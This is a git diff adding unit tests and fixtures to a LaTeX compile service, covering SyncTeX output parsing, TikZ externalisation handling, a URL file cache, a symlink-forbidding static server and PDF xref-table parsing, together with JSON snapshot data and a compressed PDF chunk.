null, + `${this.settings.path.compilesDir}/henryoswald-latex_example/output/output.log` + )) + }) + + return it('should call next', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(200) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res, done) + }) + }) + + return describe('with an error from fs.realpath', function () { + beforeEach(function () { + return (this.fs.realpath = sinon.stub().callsArgWith(1, 'error')) + }) + + return it('should send a 500', function (done) { + this.res.sendStatus = function (resCode) { + resCode.should.equal(500) + return done() + } + return this.StaticServerForbidSymlinks(this.req, this.res) + }) + }) +}) diff --git a/services/clsi/test/unit/js/SynctexOutputParserTests.js b/services/clsi/test/unit/js/SynctexOutputParserTests.js new file mode 100644 index 0000000..b999a6a --- /dev/null +++ b/services/clsi/test/unit/js/SynctexOutputParserTests.js @@ -0,0 +1,116 @@ +const Path = require('node:path') +const SandboxedModule = require('sandboxed-module') +const { expect } = require('chai') + +const MODULE_PATH = Path.join(__dirname, '../../../app/js/SynctexOutputParser') + +describe('SynctexOutputParser', function () { + beforeEach(function () { + this.SynctexOutputParser = SandboxedModule.require(MODULE_PATH) + }) + + describe('parseViewOutput', function () { + it('parses valid output', function () { + const output = `This is SyncTeX command line utility, version 1.5 +SyncTeX result begin +Output:/compile/output.pdf +Page:1 +x:136.537964 +y:661.437561 +h:133.768356 +v:663.928223 +W:343.711060 +H:9.962640 +before: +offset:-1 +middle: +after: +Output:/compile/output.pdf +Page:2 +x:178.769592 +y:649.482361 +h:134.768356 +v:651.973022 +W:342.711060 +H:19.962640 +before: +offset:-1 +middle: +after: +SyncTeX result end +` + const records = this.SynctexOutputParser.parseViewOutput(output) + expect(records).to.deep.equal([ + { + page: 1, + h: 133.768356, + v: 663.928223, + width: 343.71106, + height: 9.96264, + }, + { + page: 2, + h: 134.768356, + v: 651.973022, + width: 342.71106, + height: 19.96264, + }, + ]) + }) + + it('handles garbage', function () { + const output = 'This computer is on strike!' 
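+ // arbitrary non-SyncTeX output should produce an empty list, not a parse error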
+ const records = this.SynctexOutputParser.parseViewOutput(output) + expect(records).to.deep.equal([]) + }) + }) + + describe('parseEditOutput', function () { + it('parses valid output', function () { + const output = `This is SyncTeX command line utility, version 1.5 +SyncTeX result begin +Output:/compile/output.pdf +Input:/compile/main.tex +Line:17 +Column:-1 +Offset:0 +Context: +SyncTeX result end +` + const records = this.SynctexOutputParser.parseEditOutput( + output, + '/compile' + ) + expect(records).to.deep.equal([ + { file: 'main.tex', line: 17, column: -1 }, + ]) + }) + + it('handles values that contain colons', function () { + const output = `This is SyncTeX command line utility, version 1.5 +SyncTeX result begin +Output:/compile/output.pdf +Input:/compile/this-file:has-a-weird-name.tex +Line:17 +Column:-1 +Offset:0 +Context: +SyncTeX result end +` + + const records = this.SynctexOutputParser.parseEditOutput( + output, + '/compile' + ) + expect(records).to.deep.equal([ + { file: 'this-file:has-a-weird-name.tex', line: 17, column: -1 }, + ]) + }) + + it('handles garbage', function () { + const output = '2 + 2 = 4' + const records = this.SynctexOutputParser.parseEditOutput(output) + expect(records).to.deep.equal([]) + }) + }) +}) diff --git a/services/clsi/test/unit/js/TikzManager.js b/services/clsi/test/unit/js/TikzManager.js new file mode 100644 index 0000000..ee651f6 --- /dev/null +++ b/services/clsi/test/unit/js/TikzManager.js @@ -0,0 +1,185 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/TikzManager' +) + +describe('TikzManager', function () { + beforeEach(function () { + return (this.TikzManager = SandboxedModule.require(modulePath, { + requires: { + './ResourceWriter': (this.ResourceWriter = {}), + './SafeReader': (this.SafeReader = {}), + fs: (this.fs = {}), + }, + })) + }) + + describe('checkMainFile', function () { + beforeEach(function () { + this.compileDir = 'compile-dir' + this.mainFile = 'main.tex' + return (this.callback = sinon.stub()) + }) + + describe('if there is already an output.tex file in the resources', function () { + beforeEach(function () { + this.resources = [{ path: 'main.tex' }, { path: 'output.tex' }] + return this.TikzManager.checkMainFile( + this.compileDir, + this.mainFile, + this.resources, + this.callback + ) + }) + + return it('should call the callback with false ', function () { + return this.callback.calledWithExactly(null, false).should.equal(true) + }) + }) + + return describe('if there is no output.tex file in the resources', function () { + beforeEach(function () { + this.resources = [{ path: 'main.tex' }] + return (this.ResourceWriter.checkPath = sinon + .stub() + .withArgs(this.compileDir, this.mainFile) + .callsArgWith(2, null, `${this.compileDir}/${this.mainFile}`)) + }) + + describe('and the main file contains tikzexternalize', function () { + beforeEach(function () { + this.SafeReader.readFile = sinon + .stub() + .withArgs(`${this.compileDir}/${this.mainFile}`) + .callsArgWith(3, null, 'hello \\tikzexternalize') + return this.TikzManager.checkMainFile( + this.compileDir, + 
this.mainFile,
+            this.resources,
+            this.callback
+          )
+        })
+
+        it('should look at the file on disk', function () {
+          return this.SafeReader.readFile
+            .calledWith(`${this.compileDir}/${this.mainFile}`)
+            .should.equal(true)
+        })
+
+        return it('should call the callback with true ', function () {
+          return this.callback.calledWithExactly(null, true).should.equal(true)
+        })
+      })
+
+      describe('and the main file does not contain tikzexternalize', function () {
+        beforeEach(function () {
+          this.SafeReader.readFile = sinon
+            .stub()
+            .withArgs(`${this.compileDir}/${this.mainFile}`)
+            .callsArgWith(3, null, 'hello')
+          return this.TikzManager.checkMainFile(
+            this.compileDir,
+            this.mainFile,
+            this.resources,
+            this.callback
+          )
+        })
+
+        it('should look at the file on disk', function () {
+          return this.SafeReader.readFile
+            .calledWith(`${this.compileDir}/${this.mainFile}`)
+            .should.equal(true)
+        })
+
+        return it('should call the callback with false', function () {
+          return this.callback.calledWithExactly(null, false).should.equal(true)
+        })
+      })
+
+      return describe('and the main file contains \\usepackage{pstool}', function () {
+        beforeEach(function () {
+          this.SafeReader.readFile = sinon
+            .stub()
+            .withArgs(`${this.compileDir}/${this.mainFile}`)
+            .callsArgWith(3, null, 'hello \\usepackage[random-options]{pstool}')
+          return this.TikzManager.checkMainFile(
+            this.compileDir,
+            this.mainFile,
+            this.resources,
+            this.callback
+          )
+        })
+
+        it('should look at the file on disk', function () {
+          return this.SafeReader.readFile
+            .calledWith(`${this.compileDir}/${this.mainFile}`)
+            .should.equal(true)
+        })
+
+        return it('should call the callback with true ', function () {
+          return this.callback.calledWithExactly(null, true).should.equal(true)
+        })
+      })
+    })
+  })
+
+  return describe('injectOutputFile', function () {
+    beforeEach(function () {
+      this.rootDir = '/mock'
+      this.filename = 'filename.tex'
+      this.callback = sinon.stub()
+      this.content = `\
+\\documentclass{article}
+\\usepackage{tikz}
+\\tikzexternalize
+\\begin{document}
+Hello world
+\\end{document}\
+`
+      this.fs.readFile = sinon.stub().callsArgWith(2, null, this.content)
+      this.fs.writeFile = sinon.stub().callsArg(3)
+      this.ResourceWriter.checkPath = sinon
+        .stub()
+        .callsArgWith(2, null, `${this.rootDir}/${this.filename}`)
+      return this.TikzManager.injectOutputFile(
+        this.rootDir,
+        this.filename,
+        this.callback
+      )
+    })
+
+    it('should check the path', function () {
+      return this.ResourceWriter.checkPath
+        .calledWith(this.rootDir, this.filename)
+        .should.equal(true)
+    })
+
+    it('should read the file', function () {
+      return this.fs.readFile
+        .calledWith(`${this.rootDir}/${this.filename}`, 'utf8')
+        .should.equal(true)
+    })
+
+    it('should write out the same file as output.tex', function () {
+      return this.fs.writeFile
+        .calledWith(`${this.rootDir}/output.tex`, this.content, { flag: 'wx' })
+        .should.equal(true)
+    })
+
+    return it('should call the callback', function () {
+      return this.callback.called.should.equal(true)
+    })
+  })
+})
diff --git a/services/clsi/test/unit/js/UrlCacheTests.js b/services/clsi/test/unit/js/UrlCacheTests.js
new file mode 100644
index 0000000..a3dc2fa
--- /dev/null
+++ b/services/clsi/test/unit/js/UrlCacheTests.js
@@ -0,0 +1,148 @@
+/* eslint-disable
+  no-return-assign,
+  no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
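+//
+// Editorial note on the cases exercised below: downloadUrlToFile is expected
+// to serve files from the per-project cache directory via fs.copyFile
+// (trying cached copies for both the primary and the fallback URL) and to
+// download via UrlFetcher.promises.pipeUrlToFileWithRetry only when the
+// copies fail with ENOENT; any other copyFile error is passed through to the
+// callback.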
+/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const { expect } = require('chai') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/UrlCache' +) + +describe('UrlCache', function () { + beforeEach(function () { + this.callback = sinon.stub() + this.url = + 'http://filestore/project/60b0dd39c418bc00598a0d22/file/60ae721ffb1d920027d3201f' + this.fallbackURL = 'http://filestore/bucket/project-blobs/key/ab/cd/ef' + this.project_id = '60b0dd39c418bc00598a0d22' + return (this.UrlCache = SandboxedModule.require(modulePath, { + requires: { + './UrlFetcher': (this.UrlFetcher = { + promises: { pipeUrlToFileWithRetry: sinon.stub().resolves() }, + }), + '@overleaf/settings': (this.Settings = { + path: { clsiCacheDir: '/cache/dir' }, + }), + '@overleaf/metrics': { + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + fs: (this.fs = { + promises: { + rm: sinon.stub().resolves(), + copyFile: sinon.stub().resolves(), + }, + }), + }, + })) + }) + + describe('downloadUrlToFile', function () { + beforeEach(function () { + this.destPath = 'path/to/destination' + }) + + it('should not download on the happy path', function (done) { + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.not.exist + expect( + this.UrlFetcher.promises.pipeUrlToFileWithRetry.called + ).to.equal(false) + done() + } + ) + }) + + it('should not download on the semi-happy path', function (done) { + const codedError = new Error() + codedError.code = 'ENOENT' + this.fs.promises.copyFile.onCall(0).rejects(codedError) + this.fs.promises.copyFile.onCall(1).resolves() + + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.not.exist + expect( + this.UrlFetcher.promises.pipeUrlToFileWithRetry.called + ).to.equal(false) + done() + } + ) + }) + + it('should download on cache miss', function (done) { + const codedError = new Error() + codedError.code = 'ENOENT' + this.fs.promises.copyFile.onCall(0).rejects(codedError) + this.fs.promises.copyFile.onCall(1).rejects(codedError) + this.fs.promises.copyFile.onCall(2).resolves() + + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.not.exist + expect( + this.UrlFetcher.promises.pipeUrlToFileWithRetry.called + ).to.equal(true) + done() + } + ) + }) + + it('should raise non cache-miss errors', function (done) { + const codedError = new Error() + codedError.code = 'FOO' + this.fs.promises.copyFile.rejects(codedError) + this.UrlCache.downloadUrlToFile( + this.project_id, + this.url, + this.fallbackURL, + this.destPath, + this.lastModified, + error => { + expect(error).to.equal(codedError) + done() + } + ) + }) + }) + + describe('clearProject', function () { + beforeEach(function (done) { + this.UrlCache.clearProject(this.project_id, done) + }) + + it('should clear the cache in bulk', function () { + expect( + this.fs.promises.rm.calledWith('/cache/dir/' + this.project_id, { + force: true, + recursive: true, + }) + ).to.equal(true) + }) + }) +}) diff --git 
a/services/clsi/test/unit/js/pdfjsTests.js b/services/clsi/test/unit/js/pdfjsTests.js new file mode 100644 index 0000000..bc8b775 --- /dev/null +++ b/services/clsi/test/unit/js/pdfjsTests.js @@ -0,0 +1,93 @@ +const fs = require('node:fs') +const Path = require('node:path') +const { expect } = require('chai') +const { parseXrefTable } = require('../../../app/js/XrefParser') +const { NoXrefTableError } = require('../../../app/js/Errors') +const PATH_EXAMPLES = 'test/acceptance/fixtures/examples/' +const PATH_SNAPSHOTS = 'test/unit/js/snapshots/pdfjs/' +const EXAMPLES = fs.readdirSync(PATH_EXAMPLES) + +function snapshotPath(example) { + return Path.join(PATH_SNAPSHOTS, example, 'XrefTable.json') +} + +function pdfPath(example) { + return Path.join(PATH_EXAMPLES, example, 'output.pdf') +} + +async function loadContext(example) { + const size = (await fs.promises.stat(pdfPath(example))).size + + let blob + try { + blob = await fs.promises.readFile(snapshotPath(example)) + } catch (e) { + if (e.code !== 'ENOENT') { + throw e + } + } + const snapshot = blob ? JSON.parse(blob) : null + return { + size, + snapshot, + } +} + +async function backFillSnapshot(example, size) { + const table = await parseXrefTable(pdfPath(example), size, () => {}) + await fs.promises.mkdir(Path.dirname(snapshotPath(example)), { + recursive: true, + }) + await fs.promises.writeFile( + snapshotPath(example), + JSON.stringify(table, null, 2) + ) + return table +} + +describe('pdfjs', function () { + describe('when the pdf is an empty file', function () { + it('should yield no entries', async function () { + const path = 'does/not/matter.pdf' + let table + try { + table = await parseXrefTable(path, 0) + } catch (e) { + expect(e).to.be.an.instanceof(NoXrefTableError) + } + expect(table).to.not.exist + }) + }) + + for (const example of EXAMPLES) { + describe(example, function () { + let size, snapshot + before('load snapshot', async function () { + const ctx = await loadContext(example) + size = ctx.size + snapshot = ctx.snapshot + }) + + before('back fill new snapshot', async function () { + if (snapshot === null) { + console.error('back filling snapshot for', example) + snapshot = await backFillSnapshot(example, size) + } + }) + + it('should produce the expected xRef table', async function () { + const table = await parseXrefTable(pdfPath(example), size, () => {}) + // compare the essential parts of the xref table only + expect(table.xRefEntries[0]).to.include({ offset: 0 }) + expect(table.xRefEntries.slice(1)).to.deep.equal( + snapshot.xRefEntries + .slice(1) + .filter(xref => xref.uncompressed) // we only use the uncompressed fields + .map(xref => { + return { offset: xref.offset, uncompressed: xref.uncompressed } // ignore unused gen field + }) + ) + }) + }) + } +}) diff --git a/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71 b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71 new file mode 100644 index 0000000..bb9f891 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71 @@ -0,0 +1,7 @@ +obj +<< /Type /ObjStm /Length 447 /Filter /FlateDecode /N 5 /First 32 >> +stream +xRQk0~߯ǍK'ɒ $vkGIJ[(y8*$IRd>I"H@9@J!` V/gg f>BZxJ9ۮ]-B'ZNg k%i\!f4m݁49ĶCY]\@! 
4c Uf=JgOg>zz>A)C9WwKqPÜ#/48VX/ Tp -%2"*B;X2,9Gz;EΥJj/c +n%ᵦf3]!=y ,s]@e+COW.Ckڒ c_ťX v>N2u7=} #HVr9?kv6G^z׬.v=Uyjǡpz2 +endstream +endobj diff --git a/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/d7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/d7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd new file mode 100644 index 0000000..d503090 Binary files /dev/null and b/services/clsi/test/unit/js/snapshots/minimalCompile/chunks/d7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd differ diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/asymptote/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/asymptote/XrefTable.json new file mode 100644 index 0000000..ef4d849 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/asymptote/XrefTable.json @@ -0,0 +1,359 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 123103, + "gen": 0, + "uncompressed": true + }, + { + "offset": 123422, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1084, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1244, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4001, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4155, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4297, + "gen": 0, + "uncompressed": true + }, + { + "offset": 4933, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5309, + "gen": 0, + "uncompressed": true + }, + { + "offset": 5498, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30250, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31471, + "gen": 0, + "uncompressed": true + }, + { + "offset": 38404, + "gen": 0, + "uncompressed": true + }, + { + "offset": 39046, + "gen": 0, + "uncompressed": true + }, + { + "offset": 40166, + "gen": 0, + "uncompressed": true + }, + { + "offset": 40906, + "gen": 0, + "uncompressed": true + }, + { + "offset": 65560, + "gen": 0, + "uncompressed": true + }, + { + "offset": 74702, + "gen": 0, + "uncompressed": true + }, + { + "offset": 81705, + "gen": 0, + "uncompressed": true + }, + { + "offset": 97182, + "gen": 0, + "uncompressed": true + }, + { + "offset": 104117, + "gen": 0, + "uncompressed": true + }, + { + "offset": 111195, + "gen": 0, + "uncompressed": true + }, + { + "offset": 118571, + "gen": 0, + "uncompressed": true + }, + { + "offset": 6, + "gen": 0 + }, + { + "offset": 6, + "gen": 1 + }, + { + "offset": 6, + "gen": 2 + }, + { + "offset": 6, + "gen": 3 + }, + { + "offset": 6, + "gen": 4 + }, + { + "offset": 6, + "gen": 5 + }, + { + "offset": 6, + "gen": 6 + }, + { + "offset": 6, + "gen": 7 + }, + { + "offset": 6, + "gen": 8 + }, + { + "offset": 6, + "gen": 9 + }, + { + "offset": 6, + "gen": 10 + }, + { + "offset": 6, + "gen": 11 + }, + { + "offset": 6, + "gen": 12 + }, + { + "offset": 6, + "gen": 13 + }, + { + "offset": 6, + "gen": 14 + }, + { + "offset": 6, + "gen": 15 + }, + { + "offset": 6, + "gen": 16 + }, + { + "offset": 6, + "gen": 17 + }, + { + "offset": 6, + "gen": 18 + }, + { + "offset": 6, + "gen": 19 + }, + { + "offset": 6, + "gen": 20 + }, + { + "offset": 6, + "gen": 21 + }, + { + "offset": 6, + "gen": 22 + }, + { + "offset": 6, + "gen": 23 + }, + { + "offset": 6, + "gen": 24 + }, + { + "offset": 6, + "gen": 25 + }, + { + "offset": 6, + "gen": 26 + }, + { + "offset": 6, + "gen": 27 + }, + { + 
"offset": 6, + "gen": 28 + }, + { + "offset": 6, + "gen": 29 + }, + { + "offset": 6, + "gen": 30 + }, + { + "offset": 6, + "gen": 31 + }, + { + "offset": 6, + "gen": 32 + }, + { + "offset": 6, + "gen": 33 + }, + { + "offset": 6, + "gen": 34 + }, + { + "offset": 6, + "gen": 35 + }, + { + "offset": 6, + "gen": 36 + }, + { + "offset": 6, + "gen": 37 + }, + { + "offset": 6, + "gen": 38 + }, + { + "offset": 6, + "gen": 39 + }, + { + "offset": 6, + "gen": 40 + }, + { + "offset": 6, + "gen": 41 + }, + { + "offset": 6, + "gen": 42 + }, + { + "offset": 6, + "gen": 43 + }, + { + "offset": 6, + "gen": 44 + }, + { + "offset": 6, + "gen": 45 + }, + { + "offset": 6, + "gen": 46 + }, + { + "offset": 6, + "gen": 47 + }, + { + "offset": 6, + "gen": 48 + }, + { + "offset": 6, + "gen": 49 + }, + { + "offset": 6, + "gen": 50 + }, + { + "offset": 6, + "gen": 51 + }, + { + "offset": 6, + "gen": 52 + }, + { + "offset": 6, + "gen": 53 + }, + { + "offset": 6, + "gen": 54 + }, + { + "offset": 6, + "gen": 55 + } + ], + "startXRefTable": 123422 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/biber_bibliography/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/biber_bibliography/XrefTable.json new file mode 100644 index 0000000..93cf1c1 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/biber_bibliography/XrefTable.json @@ -0,0 +1,148 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 59313, + "gen": 0, + "uncompressed": true + }, + { + "offset": 59561, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 734, + "gen": 0, + "uncompressed": true + }, + { + "offset": 784, + "gen": 0, + "uncompressed": true + }, + { + "offset": 913, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1028, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1528, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9787, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18282, + "gen": 0, + "uncompressed": true + }, + { + "offset": 33607, + "gen": 0, + "uncompressed": true + }, + { + "offset": 45579, + "gen": 0, + "uncompressed": true + }, + { + "offset": 58005, + "gen": 0, + "uncompressed": true + }, + { + "offset": 14, + "gen": 0 + }, + { + "offset": 14, + "gen": 1 + }, + { + "offset": 14, + "gen": 2 + }, + { + "offset": 14, + "gen": 3 + }, + { + "offset": 14, + "gen": 4 + }, + { + "offset": 14, + "gen": 5 + }, + { + "offset": 14, + "gen": 6 + }, + { + "offset": 14, + "gen": 7 + }, + { + "offset": 14, + "gen": 8 + }, + { + "offset": 14, + "gen": 9 + }, + { + "offset": 14, + "gen": 10 + }, + { + "offset": 14, + "gen": 11 + }, + { + "offset": 14, + "gen": 12 + }, + { + "offset": 14, + "gen": 13 + }, + { + "offset": 14, + "gen": 14 + }, + { + "offset": 14, + "gen": 15 + }, + { + "offset": 14, + "gen": 16 + } + ], + "startXRefTable": 59561 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/draft_legacy/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/draft_legacy/XrefTable.json new file mode 100644 index 0000000..19cd40c --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/draft_legacy/XrefTable.json @@ -0,0 +1,182 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 67338, + "gen": 0, + "uncompressed": true + }, + { + "offset": 67606, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, 
+ "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 790, + "gen": 0, + "uncompressed": true + }, + { + "offset": 840, + "gen": 0, + "uncompressed": true + }, + { + "offset": 975, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1083, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1578, + "gen": 0, + "uncompressed": true + }, + { + "offset": 9881, + "gen": 0, + "uncompressed": true + }, + { + "offset": 17868, + "gen": 0, + "uncompressed": true + }, + { + "offset": 29906, + "gen": 0, + "uncompressed": true + }, + { + "offset": 38400, + "gen": 0, + "uncompressed": true + }, + { + "offset": 46656, + "gen": 0, + "uncompressed": true + }, + { + "offset": 56198, + "gen": 0, + "uncompressed": true + }, + { + "offset": 65682, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + "gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + "offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + }, + { + "offset": 16, + "gen": 14 + }, + { + "offset": 16, + "gen": 15 + }, + { + "offset": 16, + "gen": 16 + }, + { + "offset": 16, + "gen": 17 + }, + { + "offset": 16, + "gen": 18 + }, + { + "offset": 16, + "gen": 19 + }, + { + "offset": 16, + "gen": 20 + }, + { + "offset": 16, + "gen": 21 + }, + { + "offset": 16, + "gen": 22 + } + ], + "startXRefTable": 67606 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/draft_mode/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/draft_mode/XrefTable.json new file mode 100644 index 0000000..e3b965f --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/draft_mode/XrefTable.json @@ -0,0 +1,226 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 69708, + "gen": 0, + "uncompressed": true + }, + { + "offset": 70038, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 867, + "gen": 0, + "uncompressed": true + }, + { + "offset": 990, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1143, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1251, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1834, + "gen": 0, + "uncompressed": true + }, + { + "offset": 10137, + "gen": 0, + "uncompressed": true + }, + { + "offset": 18124, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31939, + "gen": 0, + "uncompressed": true + }, + { + "offset": 40433, + "gen": 0, + "uncompressed": true + }, + { + "offset": 48689, + "gen": 0, + "uncompressed": true + }, + { + "offset": 58231, + "gen": 0, + "uncompressed": true + }, + { + "offset": 67715, + "gen": 0, + "uncompressed": true + }, + { + "offset": 16, + "gen": 0 + }, + { + "offset": 16, + "gen": 1 + }, + { + "offset": 16, + "gen": 2 + }, + { + "offset": 16, + "gen": 3 + }, + { + "offset": 16, + "gen": 4 + }, + { + "offset": 16, + "gen": 5 + }, + { + "offset": 16, + "gen": 6 + }, + { + "offset": 16, + "gen": 7 + }, + { + "offset": 16, + "gen": 8 + }, + { + "offset": 16, + "gen": 9 + }, + { + "offset": 16, + "gen": 10 + }, + { + "offset": 16, + "gen": 11 + }, + { + 
"offset": 16, + "gen": 12 + }, + { + "offset": 16, + "gen": 13 + }, + { + "offset": 16, + "gen": 14 + }, + { + "offset": 16, + "gen": 15 + }, + { + "offset": 16, + "gen": 16 + }, + { + "offset": 16, + "gen": 17 + }, + { + "offset": 16, + "gen": 18 + }, + { + "offset": 16, + "gen": 19 + }, + { + "offset": 16, + "gen": 20 + }, + { + "offset": 16, + "gen": 21 + }, + { + "offset": 16, + "gen": 22 + }, + { + "offset": 16, + "gen": 23 + }, + { + "offset": 16, + "gen": 24 + }, + { + "offset": 16, + "gen": 25 + }, + { + "offset": 16, + "gen": 26 + }, + { + "offset": 16, + "gen": 27 + }, + { + "offset": 16, + "gen": 28 + }, + { + "offset": 16, + "gen": 29 + }, + { + "offset": 16, + "gen": 30 + }, + { + "offset": 16, + "gen": 31 + }, + { + "offset": 16, + "gen": 32 + }, + { + "offset": 16, + "gen": 33 + } + ], + "startXRefTable": 70038 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/epstopdf/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/epstopdf/XrefTable.json new file mode 100644 index 0000000..1687c13 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/epstopdf/XrefTable.json @@ -0,0 +1,145 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 31354, + "gen": 0, + "uncompressed": true + }, + { + "offset": 31614, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + "uncompressed": true + }, + { + "offset": 727, + "gen": 0, + "uncompressed": true + }, + { + "offset": 777, + "gen": 0, + "uncompressed": true + }, + { + "offset": 909, + "gen": 0, + "uncompressed": true + }, + { + "offset": 1017, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19127, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19313, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19557, + "gen": 0, + "uncompressed": true + }, + { + "offset": 19948, + "gen": 0, + "uncompressed": true + }, + { + "offset": 20677, + "gen": 0, + "uncompressed": true + }, + { + "offset": 23321, + "gen": 0, + "uncompressed": true + }, + { + "offset": 30318, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0 + }, + { + "offset": 15, + "gen": 1 + }, + { + "offset": 15, + "gen": 2 + }, + { + "offset": 15, + "gen": 3 + }, + { + "offset": 15, + "gen": 4 + }, + { + "offset": 15, + "gen": 5 + }, + { + "offset": 15, + "gen": 6 + }, + { + "offset": 15, + "gen": 7 + }, + { + "offset": 15, + "gen": 8 + }, + { + "offset": 15, + "gen": 9 + }, + { + "offset": 15, + "gen": 10 + }, + { + "offset": 15, + "gen": 11 + }, + { + "offset": 15, + "gen": 12 + }, + { + "offset": 15, + "gen": 13 + }, + { + "offset": 15, + "gen": 14 + } + ], + "startXRefTable": 31614 +} \ No newline at end of file diff --git a/services/clsi/test/unit/js/snapshots/pdfjs/feynmf/XrefTable.json b/services/clsi/test/unit/js/snapshots/pdfjs/feynmf/XrefTable.json new file mode 100644 index 0000000..569fc46 --- /dev/null +++ b/services/clsi/test/unit/js/snapshots/pdfjs/feynmf/XrefTable.json @@ -0,0 +1,135 @@ +{ + "xRefEntries": [ + { + "offset": 0, + "gen": 0, + "free": true + }, + { + "offset": 27064, + "gen": 0, + "uncompressed": true + }, + { + "offset": 27312, + "gen": 0, + "uncompressed": true + }, + { + "offset": 15, + "gen": 0, + "uncompressed": true + }, + { + "offset": 216, + "gen": 0, + 